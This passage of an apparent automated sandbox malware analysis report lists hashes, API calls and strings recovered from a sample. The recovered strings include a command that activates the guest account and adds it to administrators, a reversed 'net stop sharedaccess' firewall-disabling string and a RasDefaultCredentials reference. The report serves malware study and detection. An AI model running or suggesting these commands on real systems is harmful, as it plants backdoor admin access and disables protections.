                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Exec_strrev
                        • String ID: sseccaderahs pots ten
                        • API String ID: 37789026-4286520837
                        • Opcode ID: dec7a84a52131b3bfd9164eabb175c7f0188209067fcde797e1359544444c755
                        • Instruction ID: e408ea9d6fbdcda100271d0217de8f8ddb7dcf5cae5f769b224f763a0d9b1bb5
                        • Opcode Fuzzy Hash: dec7a84a52131b3bfd9164eabb175c7f0188209067fcde797e1359544444c755
                        • Instruction Fuzzy Hash: E1F0A0B660064027E7189638EC556EB7A96ABC4720F84462CFB6BC72D0D9B99948C281
                        APIs
                        Strings
                        • cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add, xrefs: 1000B524
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Execwsprintf
                        • String ID: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add
                        • API String ID: 3709078785-529560147
                        • Opcode ID: 57d901f5c6d0af30392e46c580b32ad8a8e264edd4c258811f567c1f42eea1ee
                        • Instruction ID: 0dfb14cd00998543234ec43e9161a599682dabd837b929042deb7285531c2250
                        • Opcode Fuzzy Hash: 57d901f5c6d0af30392e46c580b32ad8a8e264edd4c258811f567c1f42eea1ee
                        • Instruction Fuzzy Hash: 78F0E5B56003007BF310C728DC84B8BB6E5ABD4B04F10C839F784D2290EABDD958C55A
                        APIs
                        • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,004022CD,?,?,?,00000100,?,00000000), ref: 0040252D
                        • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,004022CD,?,?,?,00000100,?,00000000), ref: 00402561
                        • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,004022CD,?,?,?,00000100,?,00000000), ref: 0040257B
                        • HeapFree.KERNEL32(00000000,?,?,00000000,004022CD,?,?,?,00000100,?,00000000), ref: 00402592
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: AllocHeap$FreeVirtual
                        • String ID:
                        • API String ID: 3499195154-0
                        • Opcode ID: 8e23c4de90f869c85d7b3c765da6344e33f9d3ef4aa6ff554b2f35fe3fd4e612
                        • Instruction ID: 2cd63bbe23fb9df11260aeb6a55fbd4571b63b70dd59cd903e42edb8bdf6c863
                        • Opcode Fuzzy Hash: 8e23c4de90f869c85d7b3c765da6344e33f9d3ef4aa6ff554b2f35fe3fd4e612
                        • Instruction Fuzzy Hash: 66112870200601BFD7318F28ED49E227BB5FB897557904A3AF166E65F2D370989ACB4C
                        APIs
                        • lstrlen.KERNEL32(?,?,?,?,10007386,?,?,?,L$_RasDefaultCredentials#0), ref: 100072FE
                        • malloc.MSVCRT ref: 10007316
                        • lstrlen.KERNEL32(?,00000000,4C8D0824,L$_RasDefaultCredentials#0,?,?,?,?,?,?,?,?,100075E1,?), ref: 1000732B
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,100075E1,?), ref: 10007333
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$ByteCharMultiWidemalloc
                        • String ID:
                        • API String ID: 3822420913-0
                        • Opcode ID: 01a0e458b23e03b1e3e11f9f1416ba6d64d9ea9cf4cd948bdac998653c033b1e
                        • Instruction ID: a4b6d9cd29bce437580047181b5565ca307375c70172c03540230846982f558e
                        • Opcode Fuzzy Hash: 01a0e458b23e03b1e3e11f9f1416ba6d64d9ea9cf4cd948bdac998653c033b1e
                        • Instruction Fuzzy Hash: F7F0A7B21403526BF2209B54CC8AE7BB3BCEF89721F00442DF585C7240D668A805C372